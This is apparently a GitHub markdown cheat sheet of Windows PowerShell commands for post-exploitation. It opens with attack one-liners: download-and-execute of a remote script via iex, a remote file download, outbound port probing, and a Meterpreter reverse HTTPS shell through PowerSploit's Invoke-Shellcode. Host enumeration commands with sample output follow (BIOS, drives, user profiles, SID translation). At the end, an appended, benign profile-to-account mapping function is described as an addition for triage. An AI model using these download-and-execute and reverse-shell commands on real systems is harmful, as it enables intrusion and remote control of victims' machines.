powershell.md

File metadata and controls

66 lines (51 loc) · 6.61 KB
<script type="text/javascript"> $(document).ready(function() { $('div.view').hide(); $('div.slide').click(function() { $(this).next('div.view').slideToggle('fast'); return false; }); }); </script>

Windows PowerShell Commands and Scripts for Post Exploitation

One liners

Download and Execute Remote PowerShell Script

iex (New-Object Net.WebClient).DownloadString("http://host/file.txt")

Download and Save File

(new-object System.Net.WebClient).Downloadfile('http://host/file.exe', 'file.exe')

Enumerate Allowed Outbound Ports 1-1024

$ErrorActionPreference = "silentlycontinue"; 1..1024 | % {$req = [System.Net.WebRequest]::Create("http://letmeoutofyour.net:$_"); $req.Timeout = 600; $resp = $req.GetResponse(); $respstream = $resp.GetResponseStream(); 
$stream = new-object System.IO.StreamReader $respstream; $out = $stream.ReadToEnd(); if ($out.trim() -eq "w00tw00t"){echo "$_ Allowed out"}}

Reverse Shell Using PowerSploit's Invoke-Shellcode

Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.1.10 -Lport 443 -Force

Commands with Sample Output

Hardware

Get BIOS Information

  • Command with arguments: gwmi win32_bios
  • Description: Retrieves BIOS information including system serial number.
  • Output:
    • **Windows 7:**
      PS C:\Users\johndoe> gwmi win32_bios
      SMBIOSBIOSVersion : 6.00
      Manufacturer : Phoenix Technologies LTD
      Name : PhoenixBIOS 4.0 Release 6.0
      SerialNumber : VMware-56 4d 9b 0f 26 ba 8c f9-6e 7a 1e 33 5d 3c f0 dc
      Version : INTEL - 6040000

Get Drive Information

  • Command with arguments: [System.IO.DriveInfo]::GetDrives()
  • Output:
    • **Windows 7:**
      PS C:\Users\johndoe> [System.IO.DriveInfo]::GetDrives()

      Name : C:\
      DriveType : Fixed
      DriveFormat : NTFS
      IsReady : True
      AvailableFreeSpace : 55568087552
      TotalFreeSpace : 55568087552
      TotalSize : 159876850304
      RootDirectory : C:\
      VolumeLabel :

      Name : D:\
      DriveType : CDRom
      DriveFormat :
      IsReady : False
      AvailableFreeSpace :
      TotalFreeSpace :
      TotalSize :
      RootDirectory : D:\
      VolumeLabel :

      Name : G:\
      DriveType : Removable
      DriveFormat :
      IsReady : False
      AvailableFreeSpace :
      TotalFreeSpace :
      TotalSize :
      RootDirectory : G:\
      VolumeLabel :

      Name : V:\
      DriveType : Network
      DriveFormat : NTFS
      IsReady : True
      AvailableFreeSpace : 259182640616
      TotalFreeSpace : 259182640616
      TotalSize : 827361812256
      RootDirectory : V:\
      VolumeLabel : TestMappedDrive

User Information

Display Username, SID, Last Used

  • Command with arguments: gwmi win32_userprofile | select -unique @{name="Name";expression={$_.__server}},@{name="SID";expression={$_.sid}},@{name="LastUseTime";expression={$_.converttodatetime($_.lastusetime)}},localpath | ft -auto
  • Description: Retrieves information about system users.
  • Output:
    • **Windows 7:**
      PS C:\Users\johndoe> gwmi win32_userprofile | select -unique @{name="Name";expression={$_.__server}},@{name="SID";expressi
      on={$_.sid}},@{name="LastUseTime";expression={$_.converttodatetime($_.lastusetime)}},localpath | ft -auto

      Name            SID                                            LastUseTime          localpath
      ----            ---                                            -----------          ---------
      WIN-244VDGE5OGH S-1-5-21-1319606305-3131390644-2280705280-1000 4/13/2012 7:52:02 PM C:\Users\johndoe
      WIN-244VDGE5OGH S-1-5-20                                                            C:\Windows\ServiceProfiles\Netwo...
      WIN-244VDGE5OGH S-1-5-19                                                            C:\Windows\ServiceProfiles\Local...
      WIN-244VDGE5OGH S-1-5-18                                                            C:\Windows\system32\config\syste...

Translate SID to Username

  • Command with arguments: ((New-Object System.Security.Principal.SecurityIdentifier("S-1-5-19")).translate([System.Security.Principal.NTAccount])).value
  • Output:
    • **Windows 7:**
      PS C:\Users\johndoe> ((New-Object System.Security.Principal.SecurityIdentifier("S-1-5-21-1319606305-3131390644-2280705280-
      1000")).translate([System.Security.Principal.NTAccount])).value
      WIN-244VDGE5OGH\johndoe
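The two commands above (profile enumeration via win32_userprofile, and SID-to-account translation) are combined here in an added example that is not part of the original cheat sheet. It resolves every profile SID to an account name and marks SIDs that no longer map to an account, which is the orphaned-profile case a responder triaging a host wants flagged rather than thrown as an error. It assumes Windows PowerShell with Get-WmiObject available; the function name Get-ProfileAccountMap is my own.

```powershell
# Added example: map each local user profile to its account name and last-use time.
# Assumes Windows PowerShell (Get-WmiObject) on a Windows host.
function Get-ProfileAccountMap {
    [CmdletBinding()]
    param()

    Get-WmiObject -Class Win32_UserProfile | ForEach-Object {
        $sid     = $_.SID
        $account = $null
        $status  = 'Resolved'

        try {
            # Same translation as the one-liner above, applied per profile.
            $account = (New-Object System.Security.Principal.SecurityIdentifier($sid)).
                Translate([System.Security.Principal.NTAccount]).Value
        } catch {
            # .NET method exceptions arrive wrapped; inspect the inner exception.
            $ex = $_.Exception
            if ($ex.InnerException) { $ex = $ex.InnerException }
            if ($ex -is [System.Security.Principal.IdentityNotMappedException]) {
                # Profile directory still on disk, but the account is gone (deleted user,
                # left domain, etc.): worth a second look during triage.
                $status = 'Orphaned'
            } else {
                $status = "Error: $($ex.Message)"
            }
        }

        # LastUseTime is a WMI datetime string; convert it as the page's command does.
        $lastUse = $null
        if ($_.LastUseTime) { $lastUse = $_.ConvertToDateTime($_.LastUseTime) }

        [PSCustomObject]@{
            SID         = $sid
            Account     = $account
            Status      = $status
            LastUseTime = $lastUse
            LocalPath   = $_.LocalPath
            Loaded      = $_.Loaded
        }
    }
}

# Usage: most recently used profiles first; orphaned ones stand out in Status.
Get-ProfileAccountMap | Sort-Object LastUseTime -Descending | Format-Table -AutoSize
```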